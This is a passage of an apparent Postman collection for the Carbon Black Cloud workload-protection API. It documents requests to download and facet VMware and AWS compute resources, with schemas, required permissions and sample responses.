Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a81bffab-4be7-4896-8efe-131529fcc3ef"},{"name":"Download Workload Compute Resources","id":"aa834a57-a547-4481-bd4d-62d162af1ff4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 0,\n    \"criteria\": {\n        \"deployment_type\": [\n            \"WORKLOAD\"\n        ],\n        \"installation_status\": [\n            \"NOT_INSTALLED\",\n            \"PENDING\",\n            \"ERROR\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"created_at\",\n            \"order\": \"DESC\"\n        },\n        {\n            \"field\": \"eligibility\",\n            \"order\": \"ASC\"\n        }\n    ],\n    \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_search/download","description":"<h3 id=\"download-workload-compute-resources\">Download Workload Compute Resources</h3>\n<p>Async search compute resources in your organization and download them as csv or json. The request initiates search, once the search is ready, you will get notification to download the requested search result from the Carbon Black Cloud UI.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"appliance_uuid\": [ \"&lt;string&gt;\" ],\n    \"cluster_name\": [ \"&lt;string&gt;\" ],\n    \"datacenter_name\": [ \"&lt;string&gt;\" ],\n    \"deployment_type\": [\"&lt;string&gt;\"],\n    \"esx_host_name\": [ \"&lt;string&gt;\" ],\n    \"esx_host_uuid\": [ \"&lt;string&gt;\" ],\n    \"vcenter_name\": [ \"&lt;string&gt;\" ],\n    \"vcenter_host_url\": [ \"&lt;string&gt;\" ],\n    \"vcenter_uuid\": [ \"&lt;string&gt;\" ],\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"host_name\": [ \"&lt;string&gt;\" ],\n    \"ip_address\": [ \"&lt;string&gt;\" ],\n    \"device_guid\": [ \"&lt;string&gt;\" ],\n    \"registration_id\": [ \"&lt;string&gt;\" ],\n    \"eligibility\": [ \"&lt;string&gt;\" ],\n    \"eligibility_code\": [ \"&lt;string&gt;\" ],\n    \"installation_status\": [ \"&lt;string&gt;\" ],\n    \"installation_type\": [ \"&lt;string&gt;\" ],\n    \"uuid\": [ \"&lt;string&gt;\" ],\n    \"os_description\": [ \"&lt;string&gt;\" ],\n    \"os_type\": [ \"&lt;string&gt;\" ],\n    \"os_architecture\": [ \"&lt;string&gt;\" ],\n    \"vmwaretools_version\": [ \"&lt;string&gt;\" ]\n  },\n  \"exclusions\": {\n    \"appliance_uuid\": [ \"&lt;string&gt;\" ],\n    \"cluster_name\": [ \"&lt;string&gt;\" ],\n    \"datacenter_name\": [ \"&lt;string&gt;\" ],\n    \"deployment_type\": [\"&lt;string&gt;\"],\n    \"esx_host_name\": [ \"&lt;string&gt;\" ],\n    \"esx_host_uuid\": [ \"&lt;string&gt;\" ],\n    \"vcenter_name\": [ \"&lt;string&gt;\" ],\n    \"vcenter_host_url\": [ \"&lt;string&gt;\" ],\n    \"vcenter_uuid\": [ \"&lt;string&gt;\" ],\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"host_name\": [ \"&lt;string&gt;\" ],\n    \"ip_address\": [ \"&lt;string&gt;\" ],\n    \"device_guid\": [ \"&lt;string&gt;\" ],\n    \"registration_id\": [ \"&lt;string&gt;\" ],\n    \"eligibility\": [ \"&lt;string&gt;\" ],\n    \"eligibility_code\": [ \"&lt;string&gt;\" ],\n    \"installation_status\": [ \"&lt;string&gt;\" ],\n    \"installation_type\": [ \"&lt;string&gt;\" ],\n    \"uuid\": [ \"&lt;string&gt;\" ],\n    \"os_description\": [ \"&lt;string&gt;\" ],\n    \"os_type\": [ \"&lt;string&gt;\" ],\n    \"os_architecture\": [ \"&lt;string&gt;\" ],\n    \"vmwaretools_version\": [ \"&lt;string&gt;\" ]\n  },\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ],\n  \"format\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search#download-workload-compute-resources\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","_search","download"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"55e4663e-b844-41d9-b3a1-363b022987ba","name":"Download Workload Compute Resources","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 0,\n    \"criteria\": {\n        \"deployment_type\": [\n            \"WORKLOAD\"\n        ],\n        \"installation_status\": [\n            \"NOT_INSTALLED\",\n            \"PENDING\",\n            \"ERROR\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"created_at\",\n            \"order\": \"DESC\"\n        },\n        {\n            \"field\": \"eligibility\",\n            \"order\": \"ASC\"\n        }\n    ],\n    \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_search/download"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:28:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"21"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Tracer-Id","value":"2bf299e06a1cc0cb6014271b3f057ff0"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"jobId\": 5400829\n}"}],"_postman_id":"aa834a57-a547-4481-bd4d-62d162af1ff4"},{"name":"Download AWS Compute Resources","id":"063b41d3-3988-4738-b5fa-756dfdf2ff03","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 0,\n    \"criteria\": {\n        \"deployment_type\": [\n            \"AWS\"\n        ],\n        \"auto_scaling_group_name\": [\n            \"AutoScalingGroup\"\n        ],\n        \"availability_zone\": [\n            \"us-west-1c\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"virtual_private_cloud_id\": [\n            \"vpc-id\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"name\",\n            \"order\": \"ASC\"\n        }\n    ],\n    \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_search/download","description":"<h3 id=\"download-aws-compute-resources\">Download AWS Compute Resources</h3>\n<p>Async search compute resources in your organization and download them as csv or json. The request initiates search, once the search is ready, you will get notification to download the requested search result from the Carbon Black Cloud UI.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.inventory</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"deployment_type\": [\"&lt;string&gt;\"],\n    \"auto_scaling_group_name\": [\"&lt;string&gt;\"],\n    \"availability_zone\": [\"&lt;string&gt;\"],\n    \"cloud_provider_account_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_resource_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_tags\": [\"&lt;string&gt;\"],\n    \"id\": [\"&lt;string&gt;\"],\n    \"installation_status\": [\"&lt;string&gt;\"],\n    \"name\": [\"&lt;string&gt;\"],\n    \"platform\": [\"&lt;string&gt;\"],\n    \"platform_details\": [\"&lt;string&gt;\"],\n    \"region\": [\"&lt;string&gt;\"],\n    \"subnet_id\": [\"&lt;string&gt;\"],\n    \"virtual_private_cloud_id\": [\"&lt;string&gt;\"],\n  },\n  \"exclusions\": {\n    \"deployment_type\": [\"&lt;string&gt;\"],\n    \"auto_scaling_group_name\": [\"&lt;string&gt;\"],\n    \"availability_zone\": [\"&lt;string&gt;\"],\n    \"cloud_provider_account_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_resource_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_tags\": [\"&lt;string&gt;\"],\n    \"id\": [\"&lt;string&gt;\"],\n    \"installation_status\": [\"&lt;string&gt;\"],\n    \"name\": [\"&lt;string&gt;\"],\n    \"platform\": [\"&lt;string&gt;\"],\n    \"platform_details\": [\"&lt;string&gt;\"],\n    \"region\": [\"&lt;string&gt;\"],\n    \"subnet_id\": [\"&lt;string&gt;\"],\n    \"virtual_private_cloud_id\": [\"&lt;string&gt;\"],\n  },\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ],\n  \"format\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search#download-aws-compute-resources\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","_search","download"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"e0ddca7a-2f5b-4f65-957d-dfed78da21db","name":"Download AWS Compute Resources","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 0,\n    \"criteria\": {\n        \"deployment_type\": [\n            \"AWS\"\n        ],\n        \"auto_scaling_group_name\": [\n            \"AutoScalingGroup\"\n        ],\n        \"availability_zone\": [\n            \"us-west-1c\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"virtual_private_cloud_id\": [\n            \"vpc-id\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"name\",\n            \"order\": \"ASC\"\n        }\n    ],\n    \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_search/download"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:29:06 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"21"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Tracer-Id","value":"00435c4626d08986dcc83f12074467c6"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"jobId\": 5400830\n}"}],"_postman_id":"063b41d3-3988-4738-b5fa-756dfdf2ff03"},{"name":"Facet Workload Compute Resources","id":"f93ea437-0e8f-41b0-940b-b73c88de787e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"deployment_type\": [\n            \"WORKLOAD\"\n        ]\n    },\n    \"terms\": {\n        \"rows\": 100,\n        \"fields\": [\n            \"eligibility\",\n            \"installation_status\",\n            \"vmwaretools_version\",\n            \"os_type\"\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_facet","description":"<h3 id=\"facet-workload-compute-resources\">Facet Workload Compute Resources</h3>\n<p>Facet Workload compute resources in your organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"appliance_uuid\": [ \"&lt;string&gt;\" ],\n    \"cluster_name\": [ \"&lt;string&gt;\" ],\n    \"datacenter_name\": [ \"&lt;string&gt;\" ],\n    \"deployment_type\": [ \"&lt;string&gt;\" ],\n    \"esx_host_name\": [ \"&lt;string&gt;\" ],\n    \"esx_host_uuid\": [ \"&lt;string&gt;\" ],\n    \"vcenter_name\": [ \"&lt;string&gt;\" ],\n    \"vcenter_host_url\": [ \"&lt;string&gt;\" ],\n    \"vcenter_uuid\": [ \"&lt;string&gt;\" ],\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"host_name\": [ \"&lt;string&gt;\" ],\n    \"ip_address\": [ \"&lt;string&gt;\" ],\n    \"device_guid\": [ \"&lt;string&gt;\" ],\n    \"registration_id\": [ \"&lt;string&gt;\" ],\n    \"eligibility\": [ \"&lt;string&gt;\" ],\n    \"eligibility_code\": [ \"&lt;string&gt;\" ],\n    \"installation_status\": [ \"&lt;string&gt;\" ],\n    \"installation_type\": [ \"&lt;string&gt;\" ],\n    \"uuid\": [ \"&lt;string&gt;\" ],\n    \"os_description\": [ \"&lt;string&gt;\" ],\n    \"os_type\": [ \"&lt;string&gt;\" ],\n    \"os_architecture\": [ \"&lt;string&gt;\" ],\n    \"vmwaretools_version\": [ \"&lt;string&gt;\" ]\n  },\n  \"exclusions\": {\n    \"appliance_uuid\": [ \"&lt;string&gt;\" ],\n    \"cluster_name\": [ \"&lt;string&gt;\" ],\n    \"datacenter_name\": [ \"&lt;string&gt;\" ],\n    \"deployment_type\": [ \"&lt;string&gt;\" ],\n    \"esx_host_name\": [ \"&lt;string&gt;\" ],\n    \"esx_host_uuid\": [ \"&lt;string&gt;\" ],\n    \"vcenter_name\": [ \"&lt;string&gt;\" ],\n    \"vcenter_host_url\": [ \"&lt;string&gt;\" ],\n    \"vcenter_uuid\": [ \"&lt;string&gt;\" ],\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"host_name\": [ \"&lt;string&gt;\" ],\n    \"ip_address\": [ \"&lt;string&gt;\" ],\n    \"device_guid\": [ \"&lt;string&gt;\" ],\n    \"registration_id\": [ \"&lt;string&gt;\" ],\n    \"eligibility\": [ \"&lt;string&gt;\" ],\n    \"eligibility_code\": [ \"&lt;string&gt;\" ],\n    \"installation_status\": [ \"&lt;string&gt;\" ],\n    \"installation_type\": [ \"&lt;string&gt;\" ],\n    \"uuid\": [ \"&lt;string&gt;\" ],\n    \"os_description\": [ \"&lt;string&gt;\" ],\n    \"os_type\": [ \"&lt;string&gt;\" ],\n    \"os_architecture\": [ \"&lt;string&gt;\" ],\n    \"vmwaretools_version\": [ \"&lt;string&gt;\" ]\n  },\n  \"terms\": {\n    \"rows\": &lt;integer&gt;,\n    \"fields\": [\n      \"&lt;string&gt;\"\n    ]\n  }\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search#workload-facet-compute-resources\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"36c6fba0-e2de-4ad5-8e4d-50018fb77ee1","name":"Facet Workload Compute Resources","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"deployment_type\": [\n            \"WORKLOAD\"\n        ]\n    },\n    \"terms\": {\n        \"rows\": 100,\n        \"fields\": [\n            \"eligibility\",\n            \"installation_status\",\n            \"vmwaretools_version\",\n            \"os_type\"\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:29:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"526"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Tracer-Id","value":"ac927018268f15a2a165eb743d7ff545"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"terms\": [\n        {\n            \"field\": \"os_type\",\n            \"values\": [\n                {\n                    \"total\": 68,\n                    \"id\": \"WINDOWS\",\n                    \"name\": \"WINDOWS\"\n                },\n                {\n                    \"total\": 65,\n                    \"id\": \"OTHER\",\n                    \"name\": \"OTHER\"\n                },\n                {\n                    \"total\": 40,\n                    \"id\": \"RHEL\",\n                    \"name\": \"RHEL\"\n                },\n                {\n                    \"total\": 32,\n                    \"id\": \"CENTOS\",\n                    \"name\": \"CENTOS\"\n                },\n                {\n                    \"total\": 24,\n                    \"id\": \"UBUNTU\",\n                    \"name\": \"UBUNTU\"\n                },\n                {\n                    \"total\": 13,\n                    \"id\": \"SLES\",\n                    \"name\": \"SLES\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"ORACLE\",\n                    \"name\": \"ORACLE\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"SUSE\",\n                    \"name\": \"SUSE\"\n                }\n            ]\n        },\n        {\n            \"field\": \"vmwaretools_version\",\n            \"values\": [\n                {\n                    \"total\": 44,\n                    \"id\": \"11328\",\n                    \"name\": \"11328\"\n                },\n                {\n                    \"total\": 38,\n                    \"id\": \"10336\",\n                    \"name\": \"10336\"\n                },\n                {\n                    \"total\": 32,\n                    \"id\": \"11296\",\n                    \"name\": \"11296\"\n                },\n                {\n                    \"total\": 30,\n                    \"id\": \"2147483647\",\n                    \"name\": \"2147483647\"\n                },\n                {\n                    \"total\": 20,\n                    \"id\": \"0\",\n                    \"name\": \"0\"\n                },\n                {\n                    \"total\": 19,\n                    \"id\": \"10304\",\n                    \"name\": \"10304\"\n                },\n                {\n                    \"total\": 19,\n                    \"id\": \"11360\",\n                    \"name\": \"11360\"\n                },\n                {\n                    \"total\": 17,\n                    \"id\": \"10309\",\n                    \"name\": \"10309\"\n                },\n                {\n                    \"total\": 10,\n                    \"id\": \"10277\",\n                    \"name\": \"10277\"\n                },\n                {\n                    \"total\": 9,\n                    \"id\": \"10346\",\n                    \"name\": \"10346\"\n                },\n                {\n                    \"total\": 7,\n                    \"id\": \"10272\",\n                    \"name\": \"10272\"\n                },\n                {\n                    \"total\": 7,\n                    \"id\": \"10338\",\n                    \"name\": \"10338\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"10282\",\n                    \"name\": \"10282\"\n                },\n                {\n                    \"total\": 6,\n                    \"id\": \"11269\",\n                    \"name\": \"11269\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"10240\",\n                    \"name\": \"10240\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"10247\",\n                    \"name\": \"10247\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"11333\",\n                    \"name\": \"11333\"\n                },\n                {\n                    \"total\": 4,\n                    \"id\": \"10245\",\n                    \"name\": \"10245\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"\",\n                    \"name\": \"\"\n                },\n                {\n                    \"total\": 3,\n                    \"id\": \"10341\",\n                    \"name\": \"10341\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"10279\",\n                    \"name\": \"10279\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"11264\",\n                    \"name\": \"11264\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"11297\",\n                    \"name\": \"11297\"\n                },\n                {\n                    \"total\": 2,\n                    \"id\": \"12320\",\n                    \"name\": \"12320\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"10368\",\n                    \"name\": \"10368\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"12288\",\n                    \"name\": \"12288\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"12357\",\n                    \"name\": \"12357\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"9344\",\n                    \"name\": \"9344\"\n                }\n            ]\n        },\n        {\n            \"field\": \"eligibility\",\n            \"values\": [\n                {\n                    \"total\": 184,\n                    \"id\": \"NOT_ELIGIBLE\",\n                    \"name\": \"NOT_ELIGIBLE\"\n                },\n                {\n                    \"total\": 68,\n                    \"id\": \"ELIGIBLE\",\n                    \"name\": \"ELIGIBLE\"\n                },\n                {\n                    \"total\": 49,\n                    \"id\": \"UNSUPPORTED\",\n                    \"name\": \"UNSUPPORTED\"\n                }\n            ]\n        },\n        {\n            \"field\": \"installation_status\",\n            \"values\": [\n                {\n                    \"total\": 246,\n                    \"id\": \"NOT_INSTALLED\",\n                    \"name\": \"NOT_INSTALLED\"\n                },\n                {\n                    \"total\": 32,\n                    \"id\": \"ERROR\",\n                    \"name\": \"ERROR\"\n                },\n                {\n                    \"total\": 23,\n                    \"id\": \"SUCCESS\",\n                    \"name\": \"SUCCESS\"\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"f93ea437-0e8f-41b0-940b-b73c88de787e"},{"name":"Facet AWS Compute Resources","id":"83b4115a-085b-4231-b840-8d026b2c3083","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"deployment_type\": [\n            \"AWS\"\n        ]\n    },\n    \"terms\": {\n        \"rows\": 100,\n        \"fields\": [\n            \"auto_scaling_group_name\",\n            \"cloud_provider_tags\",\n            \"platform\",\n            \"platform_details\",\n            \"virtual_private_cloud_id\"\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_facet","description":"<h3 id=\"facet-aws-compute-resources\">Facet AWS Compute Resources</h3>\n<p>Facet AWS compute resources in your organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.inventory</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"appliance_uuid\": [ \"&lt;string&gt;\" ],\n    \"cluster_name\": [ \"&lt;string&gt;\" ],\n    \"datacenter_name\": [ \"&lt;string&gt;\" ],\n    \"deployment_type\": [ \"&lt;string&gt;\" ],\n    \"esx_host_name\": [ \"&lt;string&gt;\" ],\n    \"esx_host_uuid\": [ \"&lt;string&gt;\" ],\n    \"vcenter_name\": [ \"&lt;string&gt;\" ],\n    \"vcenter_host_url\": [ \"&lt;string&gt;\" ],\n    \"vcenter_uuid\": [ \"&lt;string&gt;\" ],\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"host_name\": [ \"&lt;string&gt;\" ],\n    \"ip_address\": [ \"&lt;string&gt;\" ],\n    \"device_guid\": [ \"&lt;string&gt;\" ],\n    \"registration_id\": [ \"&lt;string&gt;\" ],\n    \"eligibility\": [ \"&lt;string&gt;\" ],\n    \"eligibility_code\": [ \"&lt;string&gt;\" ],\n    \"installation_status\": [ \"&lt;string&gt;\" ],\n    \"installation_type\": [ \"&lt;string&gt;\" ],\n    \"uuid\": [ \"&lt;string&gt;\" ],\n    \"os_description\": [ \"&lt;string&gt;\" ],\n    \"os_type\": [ \"&lt;string&gt;\" ],\n    \"os_architecture\": [ \"&lt;string&gt;\" ],\n    \"vmwaretools_version\": [ \"&lt;string&gt;\" ]\n  },\n  \"exclusions\": {\n    \"appliance_uuid\": [ \"&lt;string&gt;\" ],\n    \"cluster_name\": [ \"&lt;string&gt;\" ],\n    \"datacenter_name\": [ \"&lt;string&gt;\" ],\n    \"deployment_type\": [ \"&lt;string&gt;\" ],\n    \"esx_host_name\": [ \"&lt;string&gt;\" ],\n    \"esx_host_uuid\": [ \"&lt;string&gt;\" ],\n    \"vcenter_name\": [ \"&lt;string&gt;\" ],\n    \"vcenter_host_url\": [ \"&lt;string&gt;\" ],\n    \"vcenter_uuid\": [ \"&lt;string&gt;\" ],\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"host_name\": [ \"&lt;string&gt;\" ],\n    \"ip_address\": [ \"&lt;string&gt;\" ],\n    \"device_guid\": [ \"&lt;string&gt;\" ],\n    \"registration_id\": [ \"&lt;string&gt;\" ],\n    \"eligibility\": [ \"&lt;string&gt;\" ],\n    \"eligibility_code\": [ \"&lt;string&gt;\" ],\n    \"installation_status\": [ \"&lt;string&gt;\" ],\n    \"installation_type\": [ \"&lt;string&gt;\" ],\n    \"uuid\": [ \"&lt;string&gt;\" ],\n    \"os_description\": [ \"&lt;string&gt;\" ],\n    \"os_type\": [ \"&lt;string&gt;\" ],\n    \"os_architecture\": [ \"&lt;string&gt;\" ],\n    \"vmwaretools_version\": [ \"&lt;string&gt;\" ]\n  },\n  \"terms\": {\n    \"rows\": &lt;integer&gt;,\n    \"fields\": [\n      \"&lt;string&gt;\"\n    ]\n  }\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search#aws-facet-compute-resources\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"b5aa37d1-4113-44fb-988e-0df1654abd4d","name":"Facet AWS Compute Resources","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"deployment_type\": [\n            \"AWS\"\n        ]\n    },\n    \"terms\": {\n        \"rows\": 100,\n        \"fields\": [\n            \"auto_scaling_group_name\",\n            \"cloud_provider_tags\",\n            \"platform\",\n            \"platform_details\",\n            \"virtual_private_cloud_id\"\n        ]\n    